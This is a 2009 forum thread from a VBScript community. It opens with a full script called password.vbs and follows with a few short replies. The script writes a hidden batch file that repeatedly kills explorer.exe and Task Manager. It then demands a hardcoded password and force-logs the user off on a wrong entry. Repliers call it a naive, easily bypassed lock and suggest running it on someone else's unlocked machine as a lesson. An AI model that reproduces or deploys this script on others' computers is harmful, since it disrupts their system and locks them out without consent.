password.vbs

Author Message
vbs0cmd

  • Total Posts : 15
  • Scores: 0
  • Reward points : 0
  • Joined: 8/8/2009
  • Status: offline
password.vbs Saturday, August 08, 2009 11:18 AM (permalink)
0
'password.vbs
dim x, a, aa, strtemp, strfile, fso, objfile, sp
set aa = createobject("wscript.shell")
strtemp = aa.expandenvironmentstrings("%temp%")
strfile = (strtemp)& "\password_helper.bat"
set fso = createobject("scripting.filesystemobject")
set objfile = fso.createtextfile(strfile)
objfile.writeline "@echo off"
objfile.writeline "cd %temp%"
objfile.writeline "title "
objfile.writeline ":run"
objfile.writeline "taskkill /f /im explorer.exe"
objfile.writeline "taskkill /f /im taskmgr.exe"
objfile.writeline "if exist key goto end"
objfile.writeline "goto run"
objfile.writeline ":end"
objfile.writeline "del key /q"
objfile.writeline "exit"
set x = createobject("wscript.shell")
x.run "%comspec% /c start /min "& (strfile)
set sp = createobject("sapi.spvoice")
sp.speak "nate has locked your computer"
a = inputbox("PASSWORD:","","****")
if a = ("0160") then
fso.createfolder(strtemp)& "\key"
wscript.sleep 3000
fso.deletefolder(strtemp)& "\key", true
x.run "explorer.exe"
msgbox "welcome"
end if
if not a = ("0160") then
msgbox "invalid password. LOGGING OFF..."
x.run "shutdown -f -l", vbhide
end if
wscript.quit

 
#1
    ..::Ryan::..

    • Total Posts : 108
    • Scores: 0
    • Reward points : 0
    • Joined: 3/23/2009
    • Status: offline
    RE: password.vbs Monday, August 10, 2009 3:03 AM (permalink)
    0
    What is this like a script to phish someones password?
     
    #2
      ebgreen

      • Total Posts : 8227
      • Scores: 98
      • Reward points : 0
      • Joined: 7/12/2005
      • Status: offline
      RE: password.vbs Monday, August 10, 2009 3:08 AM (permalink)
      0
      He has posted this one before. It is a naive easily bypassed way to sort of lock a computer.
      "... when you are good and crazy, oooh, oooh, oooh, the sky is the limit!" - The Tick
      Goog places to start:http://www.visualbasicscript.com/m_24727/tm.htm
      http://www.visualbasicscript.com/m_47117/tm.htm
       
      #3
        ebgreen

        • Total Posts : 8227
        • Scores: 98
        • Reward points : 0
        • Joined: 7/12/2005
        • Status: offline
        RE: password.vbs Monday, August 10, 2009 3:10 AM (permalink)
        0
        Ok, might have been a different user, but I'm sure someone posted the exact same thing.
        "... when you are good and crazy, oooh, oooh, oooh, the sky is the limit!" - The Tick
        Goog places to start:http://www.visualbasicscript.com/m_24727/tm.htm
        http://www.visualbasicscript.com/m_47117/tm.htm
         
        #4
          ..::Ryan::..

          • Total Posts : 108
          • Scores: 0
          • Reward points : 0
          • Joined: 3/23/2009
          • Status: offline
          RE: password.vbs Monday, August 10, 2009 3:12 AM (permalink)
          0
          Isn't it easier to just press Windows Key + L ?
           
          #5
            ebgreen

            • Total Posts : 8227
            • Scores: 98
            • Reward points : 0
            • Joined: 7/12/2005
            • Status: offline
            RE: password.vbs Monday, August 10, 2009 3:15 AM (permalink)
            0
            Ehh...this let's you simulate locking the machine where you can specify the password they need to unlock it. I suppose if someone that didn't know what they were doing went away from there machine without locking it you could run this to teach them a lesson.
            "... when you are good and crazy, oooh, oooh, oooh, the sky is the limit!" - The Tick
            Goog places to start:http://www.visualbasicscript.com/m_24727/tm.htm
            http://www.visualbasicscript.com/m_47117/tm.htm
             
            #6

              Online Bookmarks Sharing: Share/Bookmark

              Jump to:

              Current active users

              There are 0 members and 1 guests.

              Icon Legend and Permission

              • New Messages
              • No New Messages
              • Hot Topic w/ New Messages
              • Hot Topic w/o New Messages
              • Locked w/ New Messages
              • Locked w/o New Messages
              • Read Message
              • Post New Thread
              • Reply to message
              • Post New Poll
              • Submit Vote
              • Post reward post
              • Delete my own posts
              • Delete my own threads
              • Rate post

              2000-2012 ASPPlayground.NET Forum Version 3.9